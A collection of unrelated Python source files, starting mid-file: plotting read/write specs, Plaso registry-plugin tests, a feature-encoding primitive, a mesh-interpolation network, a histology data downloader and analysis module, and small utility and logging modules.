for klass in klass_access_subplot.mro()
for k, v in klass.__dict__.items() if inspect.isroutine(v)
]
@read_write_spec(subplot_functions)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# We mark the figure object as read and written, in that order.
fig = binding.arguments['self'].figure
return [(fig, 'read'), (fig, 'write')]
try:
import seaborn as sns
pythonutils.load_module_complete(sns)
plotting_modules = [
'seaborn.categorical',
'seaborn.distributions',
'seaborn.relational',
'seaborn.regression',
'seaborn.axisgrid',
'seaborn.matrix'
]
themeing_modules = [
'seaborn.rcmod'
]
seaborn_functions = [
getattr(sns, k, None) for k in dir(sns) if inspect.isroutine(getattr(sns, k, None))
]
seaborn_plotting_functions = [f for f in seaborn_functions
if (not hasattr(f, "__module__")) or f.__module__ in plotting_modules]
seaborn_themeing_functions = [f for f in seaborn_functions
if (not hasattr(f, "__module__")) or f.__module__ in themeing_modules]
@read_write_spec(seaborn_plotting_functions)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# Mark the current figure object as read and written, in that order.
gcf = plt.gcf()
return [(gcf, 'read'), (gcf, 'write')]
grid_subclasses = pythonutils.get_all_subclasses(sns.axisgrid.Grid)
grid_functions = {
v
for par_klass in grid_subclasses
for klass in par_klass.mro()
for k, v in klass.__dict__.items() if inspect.isroutine(v)
}
@read_write_spec(list(grid_functions))
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
try:
fig = binding.arguments['self'].fig
return [(fig, 'read'), (fig, 'write')]
except:
return []
except Exception as e:
logger.info("Failed to load specs for seaborn.")
logger.exception(e)
except Exception as e:
logger.info("Failed to load specs for matplotlib.")
logger.exception(e)
# --------------
# Plotly
# --------------
try:
import plotly
except ModuleNotFoundError:
pass
else:
try:
pythonutils.load_module_complete(plotly)
candidate_fig_creators = [plotly.graph_objs.Figure]
# Cover plotly.express functions that create a figure object
for name in dir(plotly.express):
if not name.startswith("_"):
value = getattr(plotly.express, name)
if inspect.isroutine(value):
candidate_fig_creators.append(value)
@read_write_spec(candidate_fig_creators)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
try:
if isinstance(ret_val, plotly.graph_objs.Figure):
return [(ret_val, 'write')]
except:
pass
return []
# Cover Figure methods that should update the figure
klass = plotly.graph_objs.Figure
fig_methods = {name: getattr(klass, name) for name in dir(klass)
if (not name.startswith("_")) and inspect.isroutine(getattr(klass, name))}
fig_upd_methods = [func for name, func in fig_methods.items()
if any(i in name for i in {'add_', 'update', 'append', 'set_'})]
@read_write_spec(fig_upd_methods)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
try:
self_ = binding.arguments['self']
return [(self_, 'read'), (self_, 'write')]
except:
pass
return []
except Exception as e:
logger.info("Failed to load specs for plotly")
logger.exception(e)
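

# A minimal, illustrative sketch of how a registered spec might be consumed: given the bound
# arguments of a call, the spec reports which objects were read or written. The tracing
# machinery that actually invokes these specs lives elsewhere; this demo only assumes that
# `list.append` exposes a text signature (true on recent CPython).
if __name__ == "__main__":
    _demo_lst = [1, 2]
    _demo_binding = inspect.signature(list.append).bind(_demo_lst, 3)
    for _registered_spec in SPECS[list.append]:
        print(_registered_spec(_demo_binding, None))  # -> [([1, 2], 'write')]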
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the MSIE typed URLs Windows Registry plugin."""
import unittest
from plaso.formatters import winreg as _ # pylint: disable=unused-import
from plaso.lib import timelib
from plaso.parsers.winreg_plugins import typedurls
from tests.parsers.winreg_plugins import test_lib
__author__ = 'David Nides (david.nides@gmail.com)'
class MsieTypedURLsPluginTest(test_lib.RegistryPluginTestCase):
"""Tests for the MSIE typed URLs Windows Registry plugin."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._plugin = typedurls.TypedURLsPlugin()
def testProcess(self):
"""Tests the Process function."""
test_file_entry = self._GetTestFileEntryFromPath([u'NTUSER-WIN7.DAT'])
key_path = u'\\Software\\Microsoft\\Internet Explorer\\TypedURLs'
winreg_key = self._GetKeyFromFileEntry(test_file_entry, key_path)
event_queue_consumer = self._ParseKeyWithPlugin(
self._plugin, winreg_key, file_entry=test_file_entry)
event_objects = self._GetEventObjectsFromQueue(event_queue_consumer)
self.assertEqual(len(event_objects), 13)
event_object = event_objects[0]
self.assertEqual(event_object.pathspec, test_file_entry.path_spec)
# This should just be the plugin name, as we're invoking it directly,
# and not through the parser.
self.assertEqual(event_object.parser, self._plugin.plugin_name)
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2012-03-12 21:23:53.307749')
self.assertEqual(event_object.timestamp, expected_timestamp)
regvalue_identifier = u'url1'
expected_value = u'http://cnn.com/'
self._TestRegvalue(event_object, regvalue_identifier, expected_value)
expected_string = u'[{0:s}] {1:s}: {2:s}'.format(
key_path, regvalue_identifier, expected_value)
self._TestGetMessageStrings(event_object, expected_string, expected_string)
class TypedPathsPluginTest(test_lib.RegistryPluginTestCase):
"""Tests for the typed paths Windows Registry plugin."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._plugin = typedurls.TypedURLsPlugin()
def testProcess(self):
"""Tests the Process function."""
test_file_entry = self._GetTestFileEntryFromPath([u'NTUSER-WIN7.DAT'])
key_path = (
u'\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths')
winreg_key = self._GetKeyFromFileEntry(test_file_entry, key_path)
event_queue_consumer = self._ParseKeyWithPlugin(
self._plugin, winreg_key, file_entry=test_file_entry)
event_objects = self._GetEventObjectsFromQueue(event_queue_consumer)
self.assertEqual(len(event_objects), 1)
event_object = event_objects[0]
self.assertEqual(event_object.pathspec, test_file_entry.path_spec)
# This should just be the plugin name, as we're invoking it directly,
# and not through the parser.
self.assertEqual(event_object.parser, self._plugin.plugin_name)
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2010-11-10 07:58:15.811625')
self.assertEqual(event_object.timestamp, expected_timestamp)
regvalue_identifier = u'url1'
expected_value = u'\\\\controller'
self._TestRegvalue(event_object, regvalue_identifier, expected_value)
expected_msg = u'[{0:s}] {1:s}: {2:s}'.format(
key_path, regvalue_identifier, expected_value)
expected_msg_short = u'[{0:s}] {1:s}: \\\\cont...'.format(
key_path, regvalue_identifier)
self._TestGetMessageStrings(event_object, expected_msg, expected_msg_short)
if __name__ == '__main__':
unittest.main()
|
import numpy as np
from category_encoders import HashingEncoder
from featuretools.primitives.base.transform_primitive_base import (
TransformPrimitive
)
from featuretools.variable_types import Categorical, Numeric
class HashingEnc(TransformPrimitive):
"""Applies a Hashing Encoder to the values.
Parameters:
fitted_encoder: encoder
Encoder with the same hash_method as you wish to use here
Examples:
>>> enc = Encoder(method='Hashing')
>>> enc.fit_transform(feature_matrix, features)
>>> encoder = HashingEnc(fitted_encoder=enc, category='product_id')
>>> encoded = encoder(['car', 'toothpaste', 'coke zero', 'coke zero'])
[[0, 0, 0, 0],
[1, 0, 0, 0],
[0, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
"""
name = "hashing_enc"
input_types = [Categorical]
return_type = [Numeric]
def __init__(self, fitted_encoder):
self.hash_method = fitted_encoder.get_hash_method()
self.n = fitted_encoder.get_n_components()
self.number_output_features = self.n
def get_function(self):
def transform(X):
new_encoder = HashingEncoder(hash_method=self.hash_method, n_components=self.n)
return np.swapaxes(new_encoder.fit_transform(X).values, 0, 1)
return transform
def generate_name(self, base_feature_names):
return u"%s_%s" % (base_feature_names[0].upper(), 'hashing')
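

# Minimal usage sketch. The `Encoder` wrapper mentioned in the docstring is not part of this
# module, so a small stand-in object exposing get_hash_method/get_n_components is assumed
# here purely for illustration.
if __name__ == "__main__":
    import pandas as pd

    class _FakeFittedEncoder:
        def get_hash_method(self):
            return "md5"

        def get_n_components(self):
            return 8

    transform = HashingEnc(fitted_encoder=_FakeFittedEncoder()).get_function()
    encoded = transform(pd.Series(["car", "toothpaste", "coke zero", "coke zero"]))
    print(encoded.shape)  # (8, 4): one row per hash component, one column per input value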
|
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch.nn.functional as F
from utils.arap_interpolation import *
from data.data import *
from model.layers import *
class NetParam(ParamBase):
"""Base class for hyperparameters of interpolation methods"""
def __init__(self):
super().__init__()
self.lr = 1e-4
self.num_it = 600
self.batch_size = 16
self.num_timesteps = 0
self.hidden_dim = 128
self.lambd = 1
self.lambd_geo = 50
self.log_freq = 10
self.val_freq = 10
self.log = True
class InterpolationModBase(torch.nn.Module):
def __init__(self, interp_energy: InterpolationEnergy):
super().__init__()
self.interp_energy = interp_energy
def get_pred(self, shape_x, shape_y):
raise NotImplementedError()
def compute_loss(self, shape_x, shape_y, point_pred_arr):
raise NotImplementedError()
def forward(self, shape_x, shape_y):
point_pred_arr = self.get_pred(shape_x, shape_y)
return self.compute_loss(shape_x, shape_y, point_pred_arr)
class InterpolationModGeoEC(InterpolationModBase):
def __init__(self, interp_energy: InterpolationEnergy, param=NetParam()):
super().__init__(interp_energy)
self.param = param
param.print_self()
self.rn_ec = ResnetECPos(c_dim=3, dim=7, hidden_dim=param.hidden_dim)
self.feat_module = ResnetECPos(
c_dim=param.hidden_dim, dim=6, hidden_dim=param.hidden_dim
)
print("Uses module 'InterpolationModGeoEC'")
self.Pi = None
self.Pi_inv = None
def get_pred(self, shape_x, shape_y, update_corr=True):
if update_corr:
self.match(shape_x, shape_y)
step_size = 1 / (self.param.num_timesteps + 1)
timesteps = step_size + torch.arange(0, 1, step_size, device=device).unsqueeze(
1
).unsqueeze(
2
) # [T, 1, 1]
timesteps_up = timesteps * (
torch.as_tensor([0, 0, 0, 0, 0, 0, 1], device=device, dtype=torch.float)
.unsqueeze(0)
.unsqueeze(1)
) # [T, 1, 7]
points_in = torch.cat(
(
shape_x.vert,
torch.mm(self.Pi, shape_y.vert) - shape_x.vert,
my_zeros((shape_x.vert.shape[0], 1)),
),
dim=1,
).unsqueeze(
0
) # [1, n, 7]
points_in = points_in + timesteps_up
edge_index = shape_x.get_edge_index()
displacement = my_zeros([points_in.shape[0], points_in.shape[1], 3])
for i in range(points_in.shape[0]):
displacement[i, :, :] = self.rn_ec(points_in[i, :, :], edge_index)
        # The loop above replaces the following single call, which relied on batchwise
        # processing in torch-geometric that is now deprecated:
        # displacement = self.rn_ec(points_in, edge_index)  # [T, n, 3]
point_pred_arr = shape_x.vert.unsqueeze(0) + displacement * timesteps
point_pred_arr = point_pred_arr.permute([1, 2, 0])
return point_pred_arr
def compute_loss(self, shape_x, shape_y, point_pred_arr, n_normalize=201.0):
E_x_0 = self.interp_energy.forward_single(
shape_x.vert, point_pred_arr[:, :, 0], shape_x
) + self.interp_energy.forward_single(
point_pred_arr[:, :, 0], shape_x.vert, shape_x
)
lambda_align = n_normalize / shape_x.vert.shape[0]
E_align = (
lambda_align
* self.param.lambd
* (
(torch.mm(self.Pi, shape_y.vert) - point_pred_arr[:, :, -1]).norm() ** 2
+ (
shape_y.vert - torch.mm(self.Pi_inv, point_pred_arr[:, :, -1])
).norm()
** 2
)
)
if shape_x.D is None:
E_geo = my_tensor(0)
elif self.param.lambd_geo == 0:
E_geo = my_tensor(0)
else:
E_geo = (
self.param.lambd_geo
* (
(
torch.mm(torch.mm(self.Pi, shape_y.D), self.Pi.transpose(0, 1))
- shape_x.D
)
** 2
).mean()
)
E = E_x_0 + E_align + E_geo
for i in range(self.param.num_timesteps):
E_x = self.interp_energy.forward_single(
point_pred_arr[:, :, i], point_pred_arr[:, :, i + 1], shape_x
)
E_y = self.interp_energy.forward_single(
point_pred_arr[:, :, i + 1], point_pred_arr[:, :, i], shape_x
)
E = E + E_x + E_y
return E, [E - E_align - E_geo, E_align, E_geo]
def match(self, shape_x, shape_y):
feat_x = torch.cat((shape_x.vert, shape_x.get_normal()), dim=1)
feat_y = torch.cat((shape_y.vert, shape_y.get_normal()), dim=1)
feat_x = self.feat_module(feat_x, shape_x.get_edge_index())
feat_y = self.feat_module(feat_y, shape_y.get_edge_index())
feat_x = feat_x / feat_x.norm(dim=1, keepdim=True)
feat_y = feat_y / feat_y.norm(dim=1, keepdim=True)
D = torch.mm(feat_x, feat_y.transpose(0, 1))
sigma = 1e2
self.Pi = F.softmax(D * sigma, dim=1)
self.Pi_inv = F.softmax(D * sigma, dim=0).transpose(0, 1)
return self.Pi
################################################################################################
class InterpolNet:
def __init__(
self,
interp_module: InterpolationModBase,
dataset,
dataset_val=None,
time_stamp=None,
preproc_mods=[],
settings_module=None,
):
super().__init__()
self.time_stamp = time_stamp
self.interp_module = interp_module
self.settings_module = settings_module
self.preproc_mods = preproc_mods
self.dataset = dataset
if dataset is not None:
self.train_loader = torch.utils.data.DataLoader(
dataset, batch_size=1, shuffle=True
)
self.dataset_val = dataset_val
self.i_epoch = 0
self.optimizer = torch.optim.Adam(
self.interp_module.parameters(), lr=self.interp_module.param.lr
)
def train(self):
print("start training ...")
self.interp_module.train()
while self.i_epoch < self.interp_module.param.num_it:
tot_loss = 0
tot_loss_comp = None
self.update_settings()
for i, data in enumerate(self.train_loader):
shape_x = batch_to_shape(data["X"])
shape_y = batch_to_shape(data["Y"])
shape_x, shape_y = self.preprocess(shape_x, shape_y)
loss, loss_comp = self.interp_module(shape_x, shape_y)
loss.backward()
if (i + 1) % self.interp_module.param.batch_size == 0 and i < len(
self.train_loader
) - 1:
self.optimizer.step()
self.optimizer.zero_grad()
if tot_loss_comp is None:
tot_loss_comp = [
loss_comp[i].detach() / self.dataset.__len__()
for i in range(len(loss_comp))
]
else:
tot_loss_comp = [
tot_loss_comp[i]
+ loss_comp[i].detach() / self.dataset.__len__()
for i in range(len(loss_comp))
]
tot_loss += loss.detach() / self.dataset.__len__()
self.optimizer.step()
self.optimizer.zero_grad()
print(
"epoch {:04d}, loss = {:.5f} (arap: {:.5f}, reg: {:.5f}, geo: {:.5f}), reserved memory={}MB".format(
self.i_epoch,
tot_loss,
tot_loss_comp[0],
tot_loss_comp[1],
tot_loss_comp[2],
torch.cuda.memory_reserved(0) // (1024 ** 2),
)
)
if self.time_stamp is not None:
if (self.i_epoch + 1) % self.interp_module.param.log_freq == 0:
self.save_self()
if (self.i_epoch + 1) % self.interp_module.param.val_freq == 0:
self.test(self.dataset_val)
self.i_epoch += 1
def test(self, dataset, compute_val_loss=True):
test_loader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=False)
shape_x_out = []
shape_y_out = []
points_out = []
tot_loss_val = 0
for i, data in enumerate(test_loader):
shape_x = batch_to_shape(data["X"])
shape_y = batch_to_shape(data["Y"])
shape_x, shape_y = self.preprocess(shape_x, shape_y)
point_pred = self.interp_module.get_pred(shape_x, shape_y)
if compute_val_loss:
loss, _ = self.interp_module.compute_loss(shape_x, shape_y, point_pred)
tot_loss_val += loss.detach() / len(dataset)
shape_x.detach_cpu()
shape_y.detach_cpu()
point_pred = point_pred.detach().cpu()
points_out.append(point_pred)
shape_x_out.append(shape_x)
shape_y_out.append(shape_y)
if compute_val_loss:
print("Validation loss = ", tot_loss_val)
return shape_x_out, shape_y_out, points_out
def preprocess(self, shape_x, shape_y):
for pre in self.preproc_mods:
shape_x, shape_y = pre.preprocess(shape_x, shape_y)
return shape_x, shape_y
def update_settings(self):
if self.settings_module is not None:
self.settings_module.update(self.interp_module, self.i_epoch)
def save_self(self):
folder_path = save_path(self.time_stamp)
if not os.path.isdir(folder_path):
os.mkdir(folder_path)
ckpt_last_name = "ckpt_last.pth"
ckpt_last_path = os.path.join(folder_path, ckpt_last_name)
ckpt_name = "ckpt_ep{}.pth".format(self.i_epoch)
ckpt_path = os.path.join(folder_path, ckpt_name)
self.save_chkpt(ckpt_path)
self.save_chkpt(ckpt_last_path)
def save_chkpt(self, ckpt_path):
ckpt = {
"i_epoch": self.i_epoch,
"interp_module": self.interp_module.state_dict(),
"optimizer_state_dict": self.optimizer.state_dict(),
"par": self.interp_module.param.__dict__,
}
torch.save(ckpt, ckpt_path)
def load_self(self, folder_path, num_epoch=None):
if num_epoch is None:
ckpt_name = "ckpt_last.pth"
ckpt_path = os.path.join(folder_path, ckpt_name)
else:
ckpt_name = "ckpt_ep{}.pth".format(num_epoch)
ckpt_path = os.path.join(folder_path, ckpt_name)
self.load_chkpt(ckpt_path)
if num_epoch is None:
print("Loaded model from ", folder_path, " with the latest weights")
else:
print(
"Loaded model from ",
folder_path,
" with the weights from epoch ",
num_epoch,
)
def load_chkpt(self, ckpt_path):
ckpt = torch.load(ckpt_path, map_location=device)
self.i_epoch = ckpt["i_epoch"]
self.interp_module.load_state_dict(ckpt["interp_module"])
if "par" in ckpt:
self.interp_module.param.from_dict(ckpt["par"])
self.interp_module.param.print_self()
if "optimizer_state_dict" in ckpt:
self.optimizer.load_state_dict(ckpt["optimizer_state_dict"])
self.interp_module.train()
class SettingsBase:
def update(self, interp_module, i_epoch):
raise NotImplementedError()
class SettingsFaust(SettingsBase):
def __init__(self, increase_thresh):
super().__init__()
self.increase_thresh = increase_thresh
print("Uses settings module 'SettingsFaust'")
def update(self, interp_module, i_epoch):
if i_epoch < self.increase_thresh: # 0 - 300
return
elif i_epoch < self.increase_thresh * 1.5: # 300 - 450
num_t = 1
elif i_epoch < self.increase_thresh * 1.75: # 450 - 525
num_t = 3
else: # > 525
num_t = 7
interp_module.param.num_timesteps = num_t
print("Set the # of timesteps to ", num_t)
interp_module.param.lambd_geo = 0
print("Deactivated the geodesic loss")
class PreprocessBase:
def preprocess(self, shape_x, shape_y):
raise NotImplementedError()
class PreprocessRotateBase(PreprocessBase):
def __init__(self, axis=1):
super().__init__()
self.axis = axis
def _create_rot_matrix(self, alpha):
return create_rotation_matrix(alpha, self.axis)
def _rand_rot(self):
alpha = torch.rand(1) * 360
return self._create_rot_matrix(alpha)
def rot_sub(self, shape, r):
if shape.sub is not None:
for i_p in range(len(shape.sub[0])):
shape.sub[0][i_p][0, :, :] = torch.mm(shape.sub[0][i_p][0, :, :], r)
if shape.vert_full is not None:
shape.vert_full = torch.mm(shape.vert_full, r)
return shape
def preprocess(self, shape_x, shape_y):
raise NotImplementedError()
class PreprocessRotate(PreprocessRotateBase):
def __init__(self, axis=1):
super().__init__(axis)
print("Uses preprocessing module 'PreprocessRotate'")
def preprocess(self, shape_x, shape_y):
r_x = self._rand_rot()
r_y = self._rand_rot()
shape_x.vert = torch.mm(shape_x.vert, r_x)
shape_y.vert = torch.mm(shape_y.vert, r_y)
shape_x = self.rot_sub(shape_x, r_x)
shape_y = self.rot_sub(shape_y, r_y)
return shape_x, shape_y
class PreprocessRotateSame(PreprocessRotateBase):
def __init__(self, axis=1):
super().__init__(axis)
print("Uses preprocessing module 'PreprocessRotateSame'")
def preprocess(self, shape_x, shape_y):
r = self._rand_rot()
shape_x.vert = torch.mm(shape_x.vert, r)
shape_y.vert = torch.mm(shape_y.vert, r)
shape_x = self.rot_sub(shape_x, r)
shape_y = self.rot_sub(shape_y, r)
return shape_x, shape_y
class PreprocessRotateAugment(PreprocessRotateBase):
def __init__(self, axis=1, sigma=0.3):
super().__init__(axis)
self.sigma = sigma
print(
"Uses preprocessing module 'PreprocessRotateAugment' with sigma =",
self.sigma,
)
def preprocess(self, shape_x, shape_y):
r_x = self._rand_rot_augment()
r_y = self._rand_rot_augment()
shape_x.vert = torch.mm(shape_x.vert, r_x)
shape_y.vert = torch.mm(shape_y.vert, r_y)
shape_x = self.rot_sub(shape_x, r_x)
shape_y = self.rot_sub(shape_y, r_y)
return shape_x, shape_y
# computes a pair of approximately similar rotation matrices
def _rand_rot_augment(self):
rot = torch.randn(
[3, 3], dtype=torch.float, device=device
) * self.sigma + my_eye(3)
U, _, V = torch.svd(rot, compute_uv=True)
rot = torch.mm(U, V.transpose(0, 1))
return rot
if __name__ == "__main__":
print("main of interpolation_net.py")
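
    # A small, self-contained sketch of the soft-correspondence step used in
    # InterpolationModGeoEC.match: row-/column-wise softmax over a scaled feature
    # similarity matrix (random features here, purely for illustration).
    _feat_x = torch.nn.functional.normalize(torch.randn(5, 16), dim=1)
    _feat_y = torch.nn.functional.normalize(torch.randn(7, 16), dim=1)
    _D = torch.mm(_feat_x, _feat_y.transpose(0, 1))
    _Pi = F.softmax(_D * 1e2, dim=1)                   # rows map shape_x verts onto shape_y
    _Pi_inv = F.softmax(_D * 1e2, dim=0).transpose(0, 1)
    print(_Pi.shape, _Pi_inv.shape)                    # torch.Size([5, 7]) torch.Size([7, 5])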
|
""" Histology context decoder """
from pathlib import Path
import logging
import urllib.request
import shutil
import numpy as np
import h5py
from brainspace.gradient.gradient import GradientMaps
from brainspace.utils.parcellation import reduce_by_labels
def compute_histology_gradients(
mpc,
kernel="normalized_angle",
approach="dm",
n_components=10,
alignment=None,
random_state=None,
gamma=None,
sparsity=0.9,
reference=None,
n_iter=10,
):
"""Computes microstructural profile covariance gradients.
Parameters
----------
mpc : numpy.ndarray
Microstructural profile covariance matrix.
kernel : str, optional
Kernel function to build the affinity matrix. Possible options: {‘pearson’,
‘spearman’, ‘cosine’, ‘normalized_angle’, ‘gaussian’}. If callable, must
receive a 2D array and return a 2D square array. If None, use input matrix.
By default "normalized_angle".
approach : str, optional
Embedding approach. Can be 'pca' for Principal Component Analysis, 'le' for
laplacian eigenmaps, or 'dm' for diffusion mapping, by default "dm".
n_components : int, optional
Number of components to return, by default 10.
alignment : str, None, optional
Alignment approach. Only used when two or more datasets are provided.
Valid options are 'pa' for procrustes analysis and "joint" for joint embedding.
        If None, no alignment is performed, by default None.
random_state : int, None, optional
Random state, by default None
gamma : float, None, optional
Inverse kernel width. Only used if kernel == "gaussian". If None, gamma=1/n_feat,
by default None.
sparsity : float, optional
Proportion of smallest elements to zero-out for each row, by default 0.9.
reference : numpy.ndarray, optional
Initial reference for procrustes alignments. Only used when
alignment == 'procrustes', by default None.
n_iter : int, optional
Number of iterations for Procrustes alignment, by default 10.
Returns
-------
brainspace.gradient.gradient.GradientMaps
BrainSpace gradient maps object.
"""
gm = GradientMaps(
kernel=kernel,
approach=approach,
n_components=n_components,
alignment=alignment,
random_state=random_state,
)
gm.fit(mpc, gamma=gamma, sparsity=sparsity, n_iter=n_iter, reference=reference)
return gm
def compute_mpc(profile, labels):
"""Computes MPC for given labels on a surface template.
Parameters
----------
profile : numpy.ndarray
Histological profiles of size surface-by-vertex.
labels : numpy.ndarray
Labels of regions of interest. Use 0 to denote regions that will not be included.
Returns
-------
numpy.ndarray
Microstructural profile covariance.
"""
roi_profile = reduce_by_labels(profile, labels)
if np.any(labels == 0):
# Remove 0's in the labels.
roi_profile = roi_profile[:, 1:]
p_corr = partial_correlation(roi_profile, np.mean(roi_profile, axis=1))
mpc = 0.5 * np.log((1 + p_corr) / (1 - p_corr))
mpc[p_corr > 0.99999] = 0 # Deals with floating point issues where p_corr==1
    mpc[np.isinf(mpc)] = 0
    mpc[np.isnan(mpc)] = 0  # Note: `mpc == np.nan` is always False, so use np.isnan.
return mpc
def read_histology_profile(data_dir=None, template="fsaverage", overwrite=False):
"""Reads BigBrain histology profiles.
Parameters
----------
data_dir : str, None, optional
Path to the data directory. If data is not found here then data will be
downloaded. If None, data_dir is set to the home directory, by default None.
template : str, optional
Surface template. Currently allowed options are 'fsaverage' and 'fs_LR', by
default 'fsaverage'.
overwrite : bool, optional
        If true, existing data will be overwritten, by default False.
Returns
-------
numpy.ndarray
Depth-by-vertex array of BigBrain intensities.
"""
if data_dir is None:
data_dir = Path.home() / "histology_data"
else:
data_dir = Path(data_dir)
histology_file = data_dir / ("histology_" + template + ".h5")
if not histology_file.exists() or overwrite:
logging.info(
"Could not find a histological profile or an overwrite was requested. Downloading..."
)
download_histology_profiles(
data_dir=data_dir, template=template, overwrite=overwrite
)
with h5py.File(histology_file, "r") as h5_file:
return h5_file.get(template)[...]
def download_histology_profiles(data_dir=None, template="fsaverage", overwrite=False):
"""Downloads BigBrain histology profiles.
Parameters
----------
data_dir : str, None, optional
Path to the directory to store the data. If None, defaults to the home
directory, by default None.
template : str, optional
Surface template. Currently allowed options are 'fsaverage' and 'fs_LR', by
default 'fsaverage'.
overwrite : bool, optional
        If true, existing data will be overwritten, by default False.
Raises
------
KeyError
Thrown if an invalid template is requested.
"""
if data_dir is None:
data_dir = Path.home() / "histology_data"
else:
data_dir = Path(data_dir)
data_dir.mkdir(parents=True, exist_ok=True)
output_file = data_dir / ("histology_" + template + ".h5")
urls = _get_urls()
try:
_download_file(urls[template], output_file, overwrite)
except KeyError:
raise KeyError(
"Could not find the requested template. Valid templates are: 'fs_LR_64k', 'fsaverage', 'fsaverage5'."
)
def partial_correlation(X, covar):
"""Runs a partial correlation whilst correcting for a covariate.
Parameters
----------
X : numpy.ndarray
Two-dimensional array of the data to be correlated.
covar : numpy.ndarray
One-dimensional array of the covariate.
Returns
-------
numpy.ndarray
Partial correlation matrix.
"""
X_mean = np.concatenate((X, covar[:, None]), axis=1)
pearson_correlation = np.corrcoef(X_mean, rowvar=False)
r_xy = pearson_correlation[:-1, :-1]
r_xz = pearson_correlation[0:-1, -1][:, None]
return (r_xy - r_xz @ r_xz.T) / (np.sqrt(1 - r_xz ** 2) * np.sqrt(1 - r_xz.T ** 2))
def _get_urls():
"""Stores the URLs for histology file downloads.
Returns
-------
dict
Dictionary with template names as keys and urls to the files as values.
"""
return {
"fsaverage": "https://box.bic.mni.mcgill.ca/s/znBp7Emls0mMW1a/download",
"fsaverage5": "https://box.bic.mni.mcgill.ca/s/N8zstvuRb4sNcSe/download",
"fs_LR_64k": "https://box.bic.mni.mcgill.ca/s/6zKHcg9xXu5inPR/download",
}
def _download_file(url, output_file, overwrite):
"""Downloads a file.
Parameters
----------
url : str
URL of the download.
file : pathlib.Path
Path object of the output file.
overwrite : bool
If true, overwrite existing files.
"""
if output_file.exists() and not overwrite:
logging.debug(str(output_file) + " already exists and will not be overwritten.")
return
logging.debug("Downloading " + str(output_file))
with urllib.request.urlopen(url) as response, open(output_file, "wb") as out_file:
shutil.copyfileobj(response, out_file)
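

if __name__ == "__main__":
    # Quick, illustrative sanity check of partial_correlation: two profiles that only
    # co-vary through a shared covariate have a high raw correlation but a near-zero
    # partial correlation once the covariate is regressed out.
    rng = np.random.default_rng(0)
    covar = rng.standard_normal(500)
    X = np.stack(
        [covar + 0.1 * rng.standard_normal(500), covar + 0.1 * rng.standard_normal(500)],
        axis=1,
    )
    print(np.corrcoef(X, rowvar=False)[0, 1])   # close to 1
    print(partial_correlation(X, covar)[0, 1])  # close to 0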
|
__version__ = "0.8.1.1"
from .readability import Document
|
# Copyright 2021 The Blqs Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import textwrap
from typing import Iterable
import gast
class ReplacementTransformer(gast.NodeTransformer):
def __init__(self, **replacements):
self.replacements = replacements
def visit_Name(self, node):
if node.id in self.replacements:
replacement = self.replacements[node.id]
if isinstance(replacement, str):
node.id = replacement
else:
return replacement
return node
def visit_FunctionDef(self, node):
node = self.generic_visit(node)
if node.name in self.replacements:
node.name = self.replacements[node.name]
return node
def visit_Expr(self, node):
# If we changed things, return it outside of an expression.
visited_node = self.visit(node.value)
if visited_node is node.value:
return node
return visited_node
def replace(template: str, **replacements) -> Iterable:
"""A simple templating system.
Rules:
* Replaces `Name` nodes with either the nodes that are the replacements, or if
the replacement is a string replaces the id of the `Name`.
* Replaces the name of a `FunctionDef` with a possible string replacement.
* Replaces an `Expr` wholesale with the supplied replacement nodes.
Args:
template: A string containing python code. The code can have placeholder names
that will be replaced by this call.
**replacements: Keyword arguments from the placeholder name in the code to the `gast.Node`,
a sequence of the `gast.Node`s representing the code that should be replaced,
or a string, which is used to replace an `id` or `name` as described above.
Returns:
A list of the `gast.Node`s representing the template with replaced nodes.
"""
nodes = gast.parse(textwrap.dedent(template))
transformer = ReplacementTransformer(**replacements)
replaced_nodes = transformer.visit(nodes)
return replaced_nodes.body
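

if __name__ == "__main__":
    # A short illustration of the rules above (the names used here are arbitrary): the
    # `placeholder_call` Name is renamed via a string replacement, and the function name
    # is rewritten through visit_FunctionDef.
    demo_nodes = replace(
        """
        def fn():
            placeholder_call()
        """,
        placeholder_call="real_call",
        fn="renamed_fn",
    )
    print(gast.dump(demo_nodes[0]))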
|
import logging
logging.basicConfig(filename='marvin.log',level=logging.DEBUG)
logger = logging.getLogger('MARVIN')
logger.setLevel(logging.DEBUG)
def consoleDebugActive(consoleActivated):
if(consoleActivated):
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
def debug(message):
logger.debug(message)
def info(message):
logger.info(message)
def warn(message):
    logger.warning(message)
def error(message):
logger.error(message)
def critical(message):
logger.critical(message)
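

if __name__ == "__main__":
    # Illustrative usage: mirror log records to the console in addition to marvin.log.
    consoleDebugActive(True)
    info("console handler attached")
    debug("this line goes to both marvin.log and stdout")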
|
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
